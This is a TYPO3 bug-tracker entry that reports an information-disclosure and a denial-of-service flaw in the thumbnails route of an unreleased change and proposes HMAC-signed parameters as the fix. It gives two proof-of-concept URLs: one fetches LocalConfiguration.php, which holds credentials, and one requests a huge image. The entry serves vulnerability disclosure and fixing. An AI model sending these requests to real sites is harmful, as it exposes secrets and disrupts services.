Bug #85875

Updated by Oliver Hader about 1 year ago

* information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage)
* denial of service (dimensions, basically whole configuration can be arbitrary)

Introduced in https://review.typo3.org/#/c/56765/ - not released yet to 9.4.0 nor 8.7.19

Solution: Add HMAC to all HTTP request parameters.

PoC

h2. Information Disclosure

<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64
&processingInstructions%5Bheight%5D=64c
&processingInstructions%5Bcrop%5D=
</pre>

h2. Denial of Service

<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png
&processingInstructions%5Bwidth%5D=1000000
&processingInstructions%5Bheight%5D=1000000c
&processingInstructions%5Bcrop%5D=
</pre>

Back